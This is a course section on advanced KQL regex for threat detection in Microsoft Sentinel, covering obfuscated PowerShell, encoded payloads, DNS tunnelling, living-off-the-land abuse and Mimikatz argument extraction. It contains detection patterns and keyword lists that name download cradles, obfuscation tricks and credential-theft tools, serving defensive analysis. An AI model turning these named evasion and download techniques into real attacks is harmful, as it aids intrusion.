In this section

6.2 Advanced Regex Patterns for Security Analysis

4-5 hours · Module 6

What you already know

The previous section covered mv-expand and mv-apply, working with dynamic arrays. This section covers advanced regex patterns for security analysis.

Module 5 introduced basic regex extraction. This subsection covers the advanced patterns that detect obfuscation, encoding, and evasion techniques used by adversaries to bypass simple pattern-matching detection.

Detecting obfuscated PowerShell

Adversaries obfuscate PowerShell commands by inserting backticks, carets, variable substitution, and string concatenation to break signature-based detection:

// Original: Invoke-WebRequest
// Obfuscated: In`vo`ke-We`bR`eq`uest
// Obfuscated: $a='Invoke';$b='WebRequest';iex "$a-$b"
// Obfuscated: [char]73+[char]110+[char]118... (char codes)

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "powershell.exe"
// Step 1: Remove common obfuscation characters
| extend CleanCmd = replace_regex(ProcessCommandLine, @"[`^]", "")
// Step 2: Check cleaned command for suspicious patterns
| where CleanCmd has_any ("Invoke-WebRequest", "Invoke-Expression", "DownloadString",
    "DownloadFile", "Net.WebClient", "Start-Process", "IEX", "New-Object")
    or ProcessCommandLine matches regex @"\[char\]\d+" // Char code obfuscation
    or ProcessCommandLine matches regex @"\$\w+='.+?';\$\w+='.+?'" // Variable concatenation
| extend ObfuscationType = case(
    ProcessCommandLine has "`", "Backtick insertion",
    ProcessCommandLine matches regex @"\[char\]\d+", "Char code encoding",
    ProcessCommandLine matches regex @"\$\w+='.+?';\$\w+='.+?'", "Variable concatenation",
    ProcessCommandLine has "^", "Caret insertion",
    strlen(ProcessCommandLine) > 500 and countof(ProcessCommandLine, "+") > 10, "String concatenation",
    "Other/Multiple"
)
| project TimeGenerated, DeviceName, ObfuscationType, 
    CmdPreview = substring(ProcessCommandLine, 0, 200)

The two-step approach (clean, then match) defeats simple obfuscation. The obfuscation type classification helps the analyst understand the adversary's sophistication level, backtick insertion is Script Kiddie; char code encoding suggests automated tooling; multi-technique obfuscation suggests a skilled operator.

Regex for detecting encoding and compression

DeviceProcessEvents
| where TimeGenerated > ago(24h)
// Detect base64-encoded payloads (long strings of base64 characters)
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{100,}={0,2}"
// Detect hex-encoded payloads
| where ProcessCommandLine matches regex @"(?:0x)?[0-9A-Fa-f]{50,}"
// Detect gzip magic bytes in base64 (starts with H4sI)
| where ProcessCommandLine has "H4sI"

The gzip magic bytes pattern (H4sI) is particularly useful — H4sI is the base64 representation of the gzip header bytes \x1f\x8b\x08. Adversaries compress and base64-encode their payloads to reduce size and evade detection. Finding H4sI in a command line indicates a compressed payload that needs decompression for analysis.

Negative regex patterns, detecting what SHOULD be there but is NOT

// Files with executable extensions but no valid PE header indicator
DeviceFileEvents
| where TimeGenerated > ago(24h)
| where FileName matches regex @"\.(exe|dll|sys|scr|com)$"
| where FolderPath !has "\\Windows\\" and FolderPath !has "\\Program Files"
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256

// Scripts without standard headers (missing shebang, missing param block)
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine has "-File"
| extend ScriptPath = extract(@"-File\s+""?([^""]+)""?", 1, ProcessCommandLine)
| where isnotempty(ScriptPath)
| where ScriptPath !matches regex @"\.(ps1|psm1|psd1)$"  // Non-standard extension
| project TimeGenerated, DeviceName, ScriptPath

Regex for protocol and network pattern detection

// Detect DNS over HTTPS (DoH) domains in network traffic
DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteUrl matches regex @"https://(cloudflare-dns\.com|dns\.google|doh\.opendns\.com|dns\.quad9\.net)"
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP
// DoH can be used by adversaries to exfiltrate data or resolve C2 infrastructure
// without the DNS queries appearing in standard DNS logs

// Detect data in DNS queries (DNS tunnelling indicator)
DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemotePort == 53
| where RemoteUrl matches regex @"[a-z0-9]{30,}\."  // Very long subdomain labels
| extend SubdomainLength = strlen(extract(@"^([^.]+)", 1, RemoteUrl))
| where SubdomainLength > 30
| project TimeGenerated, DeviceName, RemoteUrl, SubdomainLength

DNS tunnelling encodes data in DNS query subdomains, excessively long subdomains (30+ characters of hex or base64) indicate data exfiltration via DNS. Normal subdomains are typically under 20 characters.

Living off the Land detection patterns

LOLBAS detection requires understanding how legitimate tools are abused:

// Certutil abuse — downloading files
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "certutil.exe"
| where ProcessCommandLine matches regex @"-(urlcache|decode|encode)\s"
| extend AbuseType = case(
    ProcessCommandLine has "-urlcache", "File Download",
    ProcessCommandLine has "-decode", "Base64 Decode",
    ProcessCommandLine has "-encode", "Base64 Encode",
    "Unknown"
)
| extend TargetURL = extract(@"-f\s+(\S+)", 1, ProcessCommandLine)
| extend OutputFile = extract(@"\s(\S+\.\w{2,4})$", 1, ProcessCommandLine)
| project TimeGenerated, DeviceName, AbuseType, TargetURL, OutputFile, ProcessCommandLine

// Mshta abuse — executing HTA payloads
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "mshta.exe"
| where ProcessCommandLine matches regex @"(http|javascript:|vbscript:)"
| extend PayloadType = case(
    ProcessCommandLine has "http", "Remote HTA",
    ProcessCommandLine has "javascript:", "Inline JavaScript",
    ProcessCommandLine has "vbscript:", "Inline VBScript",
    "Unknown"
)

// Regsvr32 abuse — proxy execution
DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName =~ "regsvr32.exe"
| where ProcessCommandLine has_any ("/s /n /u /i:http", "scrobj.dll")
| extend IsSquiblydoo = ProcessCommandLine has "scrobj.dll"

Each pattern targets a specific abuse technique. The regex extracts the adversary's parameters: the downloaded URL, the output file, the payload type, giving the analyst the investigation context without needing to manually parse the command line.

Regex anti-patterns to avoid

Anti-pattern 1: Greedy matching on log data. The regex . is greedy, it matches as much as possible. On a 5,000-character command line, extract(@"start(.)end", 1, cmd) can cause catastrophic backtracking.

// SLOW: greedy .* backtracks on long strings
| extract(@"-File (.+) -", 1, ProcessCommandLine)

// FAST: non-greedy .*? or character class
| extract(@"-File (.+?) -", 1, ProcessCommandLine)
| extract(@"-File ([^\s-]+)", 1, ProcessCommandLine)

Anti-pattern 2: Regex for simple matching. Using matches regex @"mimikatz" is slower than has "mimikatz". Regex is for patterns; has, contains, and in are for literal matching.

Anti-pattern 3: Unbounded quantifiers. [A-Za-z0-9]+ without length bounds matches the entire string if it is all alphanumeric. Add bounds: [A-Za-z0-9]{1,64} for hashes, [A-Za-z0-9]{20,} for base64 payloads.

Command-line argument extraction patterns

Standard patterns for extracting arguments from common attack tools:

// Mimikatz: extract the module and command
| extend MimikatzModule = extract(@"(?:mimikatz|sekurlsa|kerberos|lsadump)::(\w+)", 1, ProcessCommandLine)

// PsExec: extract the target host
| extend PsExecTarget = extract(@"\\([^\s]+)", 1, ProcessCommandLine)

// WMI: extract the target and command
| extend WMITarget = extract(@"/node:""?(\S+?)""?\s", 1, ProcessCommandLine)
| extend WMICommand = extract(@"process\s+call\s+create\s+""(.+?)""", 1, ProcessCommandLine)

// Scheduled task: extract task name and command
| extend TaskName = extract(@"/tn\s+""?([^""]+?)""?\s", 1, ProcessCommandLine)
| extend TaskCommand = extract(@"/tr\s+""?([^""]+?)""?\s", 1, ProcessCommandLine)

// PowerShell download cradles
| extend DownloadURL = extract(@"(?:DownloadString|DownloadFile|Invoke-WebRequest|wget|curl)\s*\(?['""]?(https?://[^\s'""]+)", 1, ProcessCommandLine)

Maintain these patterns in a shared query library. When an alert fires for a suspicious process, the analyst applies the appropriate extraction pattern to immediately see the adversary's target, payload URL, or stolen data, without manually reading 500 characters of obfuscated command line.

Building a comprehensive obfuscation score

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe")
| extend ObfuscationScore = 
    // Character-level obfuscation
    iff(ProcessCommandLine has "`", 1, 0) +        // Backtick
    iff(ProcessCommandLine has "^", 1, 0) +         // Caret
    iff(countof(ProcessCommandLine, "+") > 10, 1, 0) + // String concat
    // Encoding
    iff(ProcessCommandLine has "-enc", 2, 0) +      // Base64 encoded
    iff(ProcessCommandLine matches regex @"\[char\]\d+", 2, 0) + // Char codes
    iff(ProcessCommandLine has "FromBase64String", 2, 0) +
    // Evasion flags
    iff(ProcessCommandLine has "-nop", 1, 0) +      // No profile
    iff(ProcessCommandLine has "-w hidden", 1, 0) +  // Hidden window
    iff(ProcessCommandLine has "bypass", 1, 0) +     // Execution policy bypass
    // Suspicious operations
    iff(ProcessCommandLine has "IEX", 2, 0) +        // Invoke-Expression
    iff(ProcessCommandLine has "Net.WebClient", 2, 0) + // Download
    iff(ProcessCommandLine has "Invoke-", 1, 0)      // Generic Invoke
| where ObfuscationScore >= 4
| project TimeGenerated, DeviceName, ObfuscationScore,
    CmdPreview = substring(ProcessCommandLine, 0, 200)
| sort by ObfuscationScore desc

Score 4-6: moderate obfuscation, warrants review. Score 7+: heavy obfuscation, almost certainly adversary tooling. Score 10+: multiple encoding layers and evasion techniques, high-confidence malicious activity.

Regex for log timestamp normalization

Third-party logs often contain timestamps in non-standard formats that need extraction and conversion:

Syslog
| where TimeGenerated > ago(1h)
| extend EmbeddedTimestamp = extract(@"(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:\.\d+)?Z?)", 1, SyslogMessage)
| extend ParsedTime = todatetime(EmbeddedTimestamp)
| extend TimeDrift = datetime_diff('second', TimeGenerated, ParsedTime)
| where abs(TimeDrift) > 300  // More than 5 minutes drift between log timestamp and ingestion
| project TimeGenerated, ParsedTime, TimeDrift, Computer, SyslogMessage

Timestamp drift between the embedded event time and Sentinel's TimeGenerated (ingestion time) indicates either clock skew on the source device (security concern, attackers modify clocks to confuse forensic timelines) or ingestion delay (operational concern, detection latency).

Regex for user-agent analysis in authentication logs

SigninLogs
| where TimeGenerated > ago(24h)
| where ResultType == "0"
| extend UAComponents = extract_all(@"(\w+/[\d.]+)", UserAgent)
| extend UALength = strlen(UserAgent)
| extend IsAutomated = UserAgent has_any ("python", "curl", "wget", "axios", "Go-http-client", "okhttp")
    or UALength < 20  // Very short UAs are typically automated
    or UALength > 500  // Extremely long UAs may be spoofed
| where IsAutomated
| summarize count() by UserAgent, UserPrincipalName
| sort by count_ desc

Automated User-Agents in authentication logs indicate: scripted access (legitimate API clients), adversary tooling (Python requests library, custom HTTP clients), or legacy applications using basic authentication. Each warrants different response, automated detection with UA classification accelerates that decision.

Build a PowerShell obfuscation detector that scores each command line based on the number of obfuscation techniques detected: backtick insertion, caret insertion, char code encoding, string concatenation (10+ "+" operators), variable substitution, and base64 encoding. Commands with 3+ techniques are high confidence adversary activity.

NE environmental considerations

NE's detection environment includes specific factors that influence this rule's operation:

Anti-Pattern

Using advanced regex patterns for security analysis without understanding the output

The query runs. The results look reasonable. The analyst trusts the output without verifying it against the raw data. Every KQL operator transforms data, and every transformation can mask, distort, or omit information if the operator is misused. Validate query results against known-good data before building detection rules or investigation conclusions on them.

Device diversity: 768 P2 corporate workstations with full Defender for Endpoint telemetry, 58 P1 manufacturing workstations with basic cloud-delivered protection, and 3 RHEL rendering servers with Syslog-only coverage. Rules targeting DeviceProcessEvents operate with full fidelity on P2 devices but may have reduced visibility on P1 devices. Manufacturing workstations in Sheffield and Sunderland represent a detection gap for endpoint-level detections.

Network topology: 11 offices connected via Palo Alto SD-WAN with full-mesh connectivity. The SD-WAN firewall logs feed CommonSecurityLog in Sentinel. Cross-site lateral movement generates firewall allow events that correlate with DeviceLogonEvents, enabling multi-source detection that single-table rules cannot achieve.

User population: 810 users with distinct behavioral profiles, office workers (predictable hours, consistent applications), field engineers (variable hours, travel patterns), IT administrators (elevated privilege, broad access patterns), and manufacturing operators (fixed shifts, limited application access). Each user population has different detection baselines.

Troubleshooting

"The query returns an error I do not understand." KQL error messages reference the specific line and operator that failed. Read the error message from left to right: it names the operator, the expected input type, and the actual input type. Most errors are type mismatches (passing a string where a datetime is expected) or field name typos. The getschema operator shows every field name and type for any table: TableName | getschema.

"The query runs but returns unexpected results." Add | take 10 after each operator in the pipeline and examine the intermediate output. This reveals WHERE the data transforms in a way you did not expect. Debug the pipeline stage by stage, not the entire query at once.

Section Reference

Operators covered in this subsection: Review the KQL examples above and add the patterns to your personal query library (K13). Each pattern is reusable across any Sentinel table for security investigation.

← Previous Next →